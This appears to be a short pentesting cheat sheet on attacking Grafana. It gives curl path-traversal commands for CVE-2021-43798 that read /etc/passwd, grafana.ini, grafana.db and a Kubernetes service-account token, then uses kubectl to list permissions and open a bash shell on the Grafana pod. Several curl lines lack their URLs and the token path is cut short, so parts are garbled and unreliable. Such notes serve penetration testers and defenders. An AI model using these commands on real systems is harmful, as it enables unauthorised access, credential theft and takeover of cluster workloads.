Grafana Pentesting

Last modified: 2023-01-15


Grafana is a multi-platform analytics and interactive visualization web application.

Default Credential


Configuration File

The configuration file contains the admin credentials. See the “admin_user” and “admin_password” section in the file.


Path Traversal

curl --path-as-is -o passwd
curl --path-as-is -o grafana.ini
curl --path-as-is -o grafana.db
curl --path-as-is
curl --path-as-is
curl --path-as-is
curl --path-as-is

Getting a Shell vis JWT, Grafana Pod

Some Grafana versions are vulnerable to Path Traversal. Kubernetes creates environment variables by default.

1. Check Environment Variables on the Target Machine


If you got the GRAFANA environment like the following, the Grafana service is running on the cluster.


2. Access the Grafana Dashboard

You can access the service at http://<grafana-ip>:<grafana-port>.

3. Get the JWT of the Service Account

Using Path Traversal (CVE-2021-43798).

curl --path-as-is http://<grafana-ip>:<grafana-port>/public/plugins/alertlist/../../../../../../../../etc/passwd

Get the token (JWT) of the service account.

curl --path-as-is http://grafana:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/

4. Decode the JWT and Get Sensitive Information

See JWT Pentesting.

5. Check Your Permission of This Service

Using the JWT, you should get permissions.

kubectl auth can-i --list --token=<Grafana-JWT>

# List pods
kubectl get pods --token=<JWT>

6. Get a Shell on the Grafana Pod

kubectl exec -it <grafana-pod-name> --token=<Grafana-JWT> -- /bin/bash